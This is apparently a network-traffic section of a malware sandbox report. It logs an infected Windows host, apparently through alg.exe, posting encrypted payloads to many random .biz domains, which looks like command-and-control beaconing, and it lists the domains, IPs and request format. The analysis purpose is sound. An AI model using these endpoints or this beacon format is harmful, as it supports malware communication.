Server: nginx
Date: Mon, 18 Nov 2024 08:59:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b0c1d29ba7a43e691c4764755ea97528|155.94.241.187|1731920347|1731920347|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.10 | 50062 | 34.246.200.160 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:07.011133909 CET | 347 | OUT | POST /nb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:59:07.011154890 CET | 778 | OUT | Data Raw: b4 08 a6 af db b1 8e 89 fe 02 00 00 a1 5d 9c ae 98 fc 41 82 56 3b 56 a2 6f de 78 d2 75 49 3a 87 92 c7 94 63 df da fd 51 74 fc 35 33 3d 9e ef cc 96 fd 94 15 bc 28 8e 26 43 33 9d 39 8a 20 4b 3d 98 62 3c f6 9d 7f aa 10 c6 d7 7b fc 61 8f a2 0f 34 c6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ]AV;VoxuI:cQt53=(&C39 K=b<{a4f>({H&rRZ5MgbWi@ho?QKj :f,XpRY4JKLde 9EL:7wZjhdF5%Z~}EZ
Nov 18, 2024 09:59:07.973691940 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b8c1f10eb70777738ccb4aa24d0e646c|155.94.241.187|1731920347|1731920347|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
84 | 192.168.2.10 | 50063 | 44.221.84.105 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:07.494666100 CET | 354 | OUT | POST /ybnjtwgoi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:07.494680882 CET | 834 | OUT | Data Raw: 08 f9 59 15 fc e3 8c e7 36 03 00 00 35 f7 6a aa 86 8e 84 10 d7 86 03 62 c5 59 4a f8 51 97 3e ed 9f ce a8 73 7e 25 cb 81 f0 4c 10 77 ed 8b 4f b4 03 81 0d 3a 0b 7d a1 c1 82 4a d3 a7 36 0e 46 17 6c 66 75 6e 9f 63 d2 de 34 28 77 dd bf 41 9a ce 28 af
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Y65jbYJQ>s~%LwO:}J6Flfunc4(wA(/hRp=*z9crzT-X(K6WX4*Q~3Y_<R~MCe>VqLvY h0gxZvJ8$dY`xsarO:
Nov 18, 2024 09:59:08.181231976 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=dd7dddd566ad2e8dd1403e9174177616|155.94.241.187|1731920348|1731920348|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
85 | 192.168.2.10 | 50064 | 54.244.188.177 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:08.200452089 CET | 345 | OUT | POST /u HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:08.200474977 CET | 834 | OUT | Data Raw: 00 1a 09 33 c6 0e a1 55 36 03 00 00 92 2d db 88 b7 7f 5a f3 7c c7 9c 7b d5 a4 62 17 40 cc a7 01 40 25 8a 8c f9 0a 0c 28 4b 12 d8 51 27 6e 73 98 71 49 29 06 02 94 d5 05 86 c5 bb 31 1f b8 93 30 dd 72 5b af c5 f5 28 e8 b3 fd c7 a6 39 82 8f d5 6e 5c
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 3U6-Z|{b@@%(KQ'nsqI)10r[(9n\Q@K~y_bhHY'}t0_cz>0:Y];H"oM<%G%V,,=dPLkJa=?He=L469)M%O'@dNcuNWc4;Bz
Nov 18, 2024 09:59:09.034887075 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=7be0bb28e668f0b281913246f1e2620b|155.94.241.187|1731920348|1731920348|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.10 | 50065 | 18.141.10.107 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:08.456629992 CET | 354 | OUT | POST /avkhmehufii HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:59:08.456629992 CET | 778 | OUT | Data Raw: 88 0a 24 a8 8f ae 46 50 fe 02 00 00 2d 54 55 bb c1 61 77 cf af 7c bb 6b e5 20 fc b6 3d 75 ff c0 4c b6 52 75 b5 13 4e 0f 04 45 57 55 67 34 46 14 67 e6 b9 6e bb 50 58 8b 99 23 63 eb 68 87 7c b5 4c 38 af d9 94 54 59 db d3 42 e8 dc f5 59 3b 22 7c d7
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: $FP-TUaw|k =uLRuNEWUg4FgnPX#ch|L8TYBY;"|z`}h`XrI{BAe8MRYQ"ml+Cbr?YccD"(3SN3d)y^z|!nSERFL*@X0+^}g:I
Nov 18, 2024 09:59:09.911253929 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=93a01e6c148b570e5a2719b01addbbf1|155.94.241.187|1731920349|1731920349|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
87 | 192.168.2.10 | 50066 | 35.164.78.200 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:09.095609903 CET | 348 | OUT | POST /bsnsmn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:09.095609903 CET | 834 | OUT | Data Raw: 29 d2 37 da aa 7f e3 00 36 03 00 00 eb 2c 95 35 10 c5 95 f4 0e 65 34 d7 71 65 43 23 c7 d6 1a 0e cc 40 16 59 0e 29 0b 53 88 2f 41 30 9b 2b 0c c1 1c 7e 9b 4a 01 56 c1 7f 03 e9 15 4b 0e 4c 52 3c 6f 14 1c 7a 21 7c 0c 52 7c fe 07 59 0d c8 51 57 f3 b6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: )76,5e4qeC#@Y)S/A0+~JVKLR<oz!|R|YQWpT&?`E)G}D^jqqWnWk,mDn[.rnz IEPDM)u<2@{~#6%HKZvR"KE^gl-@I^E[>[n
Nov 18, 2024 09:59:09.915406942 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d3503357ee3f4a43b33b36b643f82cfe|155.94.241.187|1731920349|1731920349|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
88 | 192.168.2.10 | 50067 | 3.94.10.34 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:09.969805002 CET | 349 | OUT | POST /awlv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:09.969827890 CET | 834 | OUT | Data Raw: 53 8a 65 82 8f ef 26 aa 36 03 00 00 4d 5d 06 e9 1b 2b 1c 5d cf 0e 60 c2 4b 51 fa 95 43 b4 c8 1e d8 f1 d9 5e a8 29 d2 06 90 80 52 d6 ef 41 4f 3a f2 3e f3 e4 4f 39 65 75 0c 17 78 38 5c 07 b6 75 cf 34 5f ae bc 11 99 3f 09 29 a5 13 53 e3 63 16 05 11
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Se&6M]+]`KQC^)RAO:>O9eux8\u4_?)Sc2zWFuLB:GP%;D?;han8 /cz:R(Z.sMrA[JE?[Doi:fI*[A(>iG;N~U
Nov 18, 2024 09:59:10.605551004 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=cb6166011a29e120f7e2ad454fba373a|155.94.241.187|1731920350|1731920350|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port
89          192.168.2.10  50068        165.160.15.20   80
Timestamp  Bytes transferred  Direction  Data
Nov 18, 2024 09:59:10.622685909 CET  347  OUT  POST /bhirak HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.622700930 CET834OUTData Raw: e5 1b d8 b4 51 9a 55 91 36 03 00 00 b4 cc 59 37 cc 74 1e e0 29 d5 0a eb 7c 7d 77 bd e2 1a 57 d3 7f bc 9b d1 7f 2e 0a 59 40 c0 45 4d 56 e4 bf 9e a6 97 b4 33 c0 fa d9 c7 98 46 c2 f1 03 c3 17 5c d2 fa 66 44 e9 06 16 8c 0e 1b 54 2c b5 74 c3 ec 66 21
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: QU6Y7t)|}wW.Y@EMV3F\fDT,tf!cACjB*/4`]A`*J~j)Gax}DrFME> .'U<M5LNUbeBaBFv@J\&E\z^#.SY?D6y?/b$q1f`j
Nov 18, 2024 09:59:11.355098009 CET  170  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
Nov 18, 2024 09:59:11.358951092 CET  344  OUT  POST /lje HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.358983040 CET834OUTData Raw: 42 cd c6 bd 22 46 50 86 36 03 00 00 ed ef 5b 01 2f 20 f1 73 e8 11 3c 23 19 6b 86 36 b8 b2 87 9a 64 6f 2f cd 9e 03 25 e8 5b 7e 43 4f b5 59 b9 74 5e 9c ad 84 48 f8 fe 43 57 52 2c 1e e5 4b 06 7e 73 ba 7e 57 3b da be 8f ec dd bb eb 02 be cd d1 24 70
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: B"FP6[/ s<#k6do/%[~COYt^HCWR,K~s~W;$p5z!ZPjI;n7u-%Qb~0o:;>AXQET_e?Y$"h^u2mq?$L 7|4H5@W0y@(Kf_lB8F
Nov 18, 2024 09:59:11.536428928 CET  170  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
90          192.168.2.10  50069        13.251.16.150   80                7888  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Nov 18, 2024 09:59:10.647481918 CET  352  OUT  POST /cckxgccommw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.647644997 CET778OUTData Raw: b9 be 90 aa 16 57 fa 0d fe 02 00 00 6e 67 af ff ce ee b6 9a 10 78 d9 42 8b 4e fd 46 6d 41 02 9f 13 12 35 e7 62 d7 17 52 80 71 40 78 4b 95 15 9d 4a 0f 01 ef 1a 53 fc 85 b0 69 2f a3 e9 7d 6c f2 ca 9d a8 1d d5 53 ec 7b a7 80 73 b1 e6 2b 45 28 00 8d
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: WngxBNFmA5bRq@xKJSi/}lS{s+E(OFv0S4@z<sLY=*l(=K: w5dd#x[6W"2,=]lO(+!qbP??4Ewb1:B,B&f~`z.
Nov 18, 2024 09:59:12.090563059 CET  413  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=02e55fb88856d24c844e165538abe382|155.94.241.187|1731920351|1731920351|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port
91          192.168.2.10  50070        54.244.188.177  80
Timestamp  Bytes transferred  Direction  Data
Nov 18, 2024 09:59:12.413577080 CET  359  OUT  POST /aykeetjatrhfhv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.413577080 CET834OUTData Raw: ce e5 2c e4 80 11 1f e8 36 03 00 00 8e 1b cb 37 21 5a ff 66 53 eb c1 c2 05 e3 c3 fe 0a 93 3f c6 a8 5e 1d 07 cb c8 ce 56 6f 70 ae 03 56 90 bf e6 a1 e0 f3 0f e8 4b 04 b1 cc 00 9b 98 6a 08 a5 93 6e 6a f6 a6 42 00 bb e5 89 de e2 84 9d 3f 11 f8 dd 92
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ,67!ZfS?^VopVKjnjB?G;L'|BDX%>lc4`ZPi8]K-UlAma+P"@+yPuNq2q/SyP Z]"2M6c"?\X[unNGa5/
Nov 18, 2024 09:59:13.249610901 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b3603bdb3233f526546a4d01b2b56f1a|155.94.241.187|1731920353|1731920353|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.10 | 50071 | 18.208.156.248 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:12.678416014 CET | 352 | OUT | POST /fddxbhb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:59:12.678443909 CET | 778 | OUT | Data Raw: 1e 6c bc 0d 89 3b 65 13 fe 02 00 00 2a 16 1b 2c e3 ec 3f ad d0 fe f1 c2 1d f0 72 cc 36 db d9 b8 bb cd ba 52 f2 bd 04 1a 33 6c 48 10 ee 19 0e 3a 33 fb 37 de 64 03 70 8e 47 26 60 0e 68 0e 74 b8 c4 eb dc 60 b6 9d 30 73 56 18 27 a5 10 79 3f af 0d 80
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: l;e*,?r6R3lH:37dpG&`ht`0sV'y?Lz@<^sHQDZG{LsI[gX{5'Dx&Tl,Qa,00EDDUv?H4=Zx8G+uwx[%lG36!,mP<
